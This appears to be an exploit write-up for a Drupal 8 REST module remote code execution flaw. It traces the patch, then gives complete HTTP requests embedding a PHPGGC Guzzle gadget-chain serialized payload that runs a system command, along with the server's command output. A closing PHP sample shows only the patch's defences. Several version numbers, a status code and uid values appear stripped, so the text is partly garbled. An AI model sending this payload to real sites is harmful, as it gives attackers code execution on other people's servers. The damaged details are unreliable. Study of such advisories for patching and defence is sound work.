[EXP]Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution
Analyzing the patch
By diffing Drupal 8.6. and 8.6., we can see that in the REST module, FieldItemNormalizer now uses a new trait, SerializedColumnNormalizerTrait. This trait provides the checkForSerializedStrings() method, which in short raises an exception if a string is provided for a value that is stored as a serialized string. This indicates the exploitation vector fairly clearly: through a REST request, the attacker needs to send a serialized property. This property will later be unserialize()d, which can easily be exploited using tools such as PHPGGC. Another modified file gives indications as to which property can be used: LinkItem now uses unserialize($values['options'], ['allowed_classes' => FALSE]); instead of the standard unserialize($values['options']);. As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link.

Triggering the unserialize()
Having all these elements in mind, triggering an unserialize is fairly easy:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1
Host: 192.168.1.25
Content-Type: application/hal+json
Content-Length: 

{
    "link": [
        {
            "value": "link",
            "options": "<SERIALIZED_CONTENT>"
        }
    ],
    "_links": {
        "type": {
            "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"
        }
    }
}
Since Drupal uses Guzzle, we can generate a payload using PHPGGC:

$ ./phpggc guzzle/rce1 system id --json
"O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
We can now send the payload via GET:

GET /drupal-8.6./node/?_format=hal_json HTTP/1.1
Host: 192.168.1.25
Content-Type: application/hal+json
Content-Length: 

{
    "link": [
        {
            "value": "link",
            "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
        }
    ],
    "_links": {
        "type": {
            "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"
        }
    }
}
To which Drupal responds:

HTTP/1.1 OK
Link: <...>
X-Generator: Drupal (https://www.drupal.org)
X-Drupal-Cache: MISS
Connection: close
Content-Type: application/hal+json
Content-Length: {...}

uid=(www-data) gid=(www-data) groups=(www-data)
Note: Drupal caches responses: if you're in a testing environment, clear the cache. If not, try another node ID.
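As an added example, written for this page and not Drupal's own code, the following PHP isolates the two defences the patch analysis above describes: a check in the spirit of checkForSerializedStrings() that refuses a string supplied for a column stored serialized, and an unserialize() call with allowed_classes => FALSE, so that even an object string that already reached storage never becomes a live object. Function names and the sample inputs are constructed.

```php
<?php
// Added illustration, not Drupal's code: the two defences the patch introduces.

// 1. Mirrors the intent of checkForSerializedStrings(): a column that Drupal
//    stores serialized must arrive as structured data, never as a string.
function rejectSerializedStringInput(array $values, string $column): void
{
    if (isset($values[$column]) && is_string($values[$column])) {
        throw new UnexpectedValueException(sprintf(
            'String received for serialized column "%s"; structured data expected', $column));
    }
}

// 2. Mirrors the patched LinkItem: allowed_classes => FALSE means unserialize()
//    never instantiates a class, so no gadget's magic method can run.
function unserializeOptions(string $stored): array
{
    $options = unserialize($stored, ['allowed_classes' => false]);
    // Objects degrade to __PHP_Incomplete_Class; treat their presence as tampering.
    return (is_array($options) && !containsIncompleteClass($options)) ? $options : [];
}

function containsIncompleteClass($value): bool
{
    if ($value instanceof __PHP_Incomplete_Class) { return true; }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (containsIncompleteClass($item)) {
                return true;
            }
        }
    }
    return false;
}

// Constructed inputs: a legitimate link value, and one smuggling an object string
// (stdClass stands in for any serialized object) into the "options" column.
$legit   = ['value' => 'internal:/node/1', 'options' => ['attributes' => ['target' => '_blank']]];
$hostile = ['value' => 'link', 'options' => 'O:8:"stdClass":0:{}'];

rejectSerializedStringInput($legit, 'options');          // accepted: options is an array
try {
    rejectSerializedStringInput($hostile, 'options');
} catch (UnexpectedValueException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// Even a string already in storage yields no live object.
var_dump(unserializeOptions(serialize($legit['options'])) === $legit['options']);
var_dump(unserializeOptions($hostile['options']));
```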